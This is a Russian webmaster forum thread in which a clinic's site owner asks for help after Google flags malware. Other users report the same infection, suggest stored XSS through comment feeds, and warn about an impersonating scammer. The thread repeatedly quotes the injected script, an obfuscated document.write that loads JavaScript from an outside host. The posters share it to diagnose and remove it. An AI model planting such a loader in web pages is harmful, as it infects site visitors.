Гугл нашел вирус на сайте, помогите найти.

12
K
На сайте с 14.02.2013
Offline
25
2349

Сайт http://kosmet.pro

В гугл вебмастере предупреждение и вот такой пример, где его искать ума не приложу...

<script>document.write("<sc"+"ript src='http://hppfast.ru/ist.js'></scr"+"ipt>");</script>

---------- Добавлено 13.02.2014 в 15:03 ----------

И сразу мошенник представившись другим пользователем предложил помощь в аське.

Внимание его ICQ 151435428

Выдает себя за Rxp и ссылается на эту ветку /ru/forum/635696*

Попросил написать мне в личку- слился

Космет Про (http://kosmet.pro) - косметологический центр.
K
На сайте с 14.02.2013
Offline
25
#1

Ну откликнитесь кто-нибудь)

W
На сайте с 20.02.2011
Offline
46
#2

Вот почитайте - /ru/forum/comment/12626492

Сделаю вас богатыми и счастливыми (копирайтер+менеджер везде за вас) (/ru/forum/715102)
GC
На сайте с 09.04.2007
Offline
159
GKC
#3

А спросить у самих гуглов? Не?

---------- Добавлено 13.02.2014 в 18:11 ----------

kosmet:
...И сразу мошенник представившись другим пользователем предложил помощь в аське....Попросил написать мне в личку- слился

Вы серьезно больны... У врача были?

Автоматическое удаление информации (http://www.gkclab.com/russ/terminator/terminator.html) ... Мистический туризм (http://mystictourism.com/) в гости к призракам...
K5
На сайте с 21.07.2010
Offline
209
#4
Вы серьезно больны

GKC, чем же??????????

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
G
На сайте с 13.02.2014
Offline
5
#5

Это активная XSS. Код сохранен в файлах сайта. И искать нужно измененный файл за тот день и раньше когда обнаружилась уязвимость.

---------- Добавлено 13.02.2014 в 21:38 ----------

gidiu:
Это активная XSS. Код сохранен в файлах сайта. И искать нужно измененный файл за тот день и раньше когда обнаружилась уязвимость.

Сразу мылит глаз лента коментов. Не помню, как вывод там идет, но если из контакта поставить скрипт, или самому занести в гугл или самотеком. А если комент можно удалить - следов нет. Нужно проверять все фильтры ввода сайта. Если лента коментов не проверяется - это суперская вещь для сохранения нехорошего кода на сайт. Да путей взлома много.

---------- Добавлено 13.02.2014 в 22:11 ----------

UPD. Правда, не помню как идет вывод контакта. Не исключено, что там сразу все фильтруется)

R
На сайте с 24.01.2008
Offline
180
#6
kosmet:
Сайт http://kosmet.pro
В гугл вебмастере предупреждение и вот такой пример, где его искать ума не приложу...

<script>document.write("<sc"+"ript src='http://hppfast.ru/ist.js'></scr"+"ipt>");</script>

---------- Добавлено 13.02.2014 в 15:03 ----------

И сразу мошенник представившись другим пользователем предложил помощь в аське.
Внимание его ICQ 151435428

Выдает себя за Rxp и ссылается на эту ветку /ru/forum/635696*

Попросил написать мне в личку- слился

Да, с повадился один паразит от моего имени писать, будите внимательнее!

Сам код может понятное дело находится в любом месте, внешний вам будет сложно помочь, все стандартные советы испробуйте.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
D
На сайте с 18.02.2014
Offline
1
#7
kosmet:
Сайт http://kosmet.pro
В гугл вебмастере предупреждение и вот такой пример, где его искать ума не приложу...

<script>document.write("<sc"+"ript src='http://hppfast.ru/ist.js'></scr"+"ipt>");</script>

---------- Добавлено 13.02.2014 в 15:03 ----------

И сразу мошенник представившись другим пользователем предложил помощь в аське.
Внимание его ICQ 151435428

Выдает себя за Rxp и ссылается на эту ветку /ru/forum/635696*

Попросил написать мне в личку- слился

Случилась точно такая же беда!

Смотрю вроде ваш сайт грузится без проблем. Вам удалось решить проблему? Если да, то прошу рассказать как удалось истребить эту гадость... Пожалуйста!

K
На сайте с 14.02.2013
Offline
25
#8
dreamboy:
Случилась точно такая же беда!
Смотрю вроде ваш сайт грузится без проблем. Вам удалось решить проблему? Если да, то прошу рассказать как удалось истребить эту гадость... Пожалуйста!

У меня подозрение на хостинг, твой сайт на hostland.ru находится?

A
На сайте с 19.02.2014
Offline
1
#9

С сайтом то же самое, гугл ругается на то, что находит этот скрипт, хотя я его нигде обнаружить не могу. Сегодня начал и яндекс ругаться. Хостинг на fastvps.ru так что не думаю, что дело в хостинге.

D
На сайте с 18.02.2014
Offline
1
#10
kosmet:
У меня подозрение на хостинг, твой сайт на hostland.ru находится?

Правильно я понял, что тебе проблему так и не удалось решить? Твой сайт я в хроме без проблем открываю, а на мой ругается :(

Хостинг у меня другой и там админом мой знакомый. Он проверил всеми известными ему способами сервер, но ничего не нашел. На сервере, кстати, есть антивирус Clamav и он тоже ничего не находит. Что делать не знаю...

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий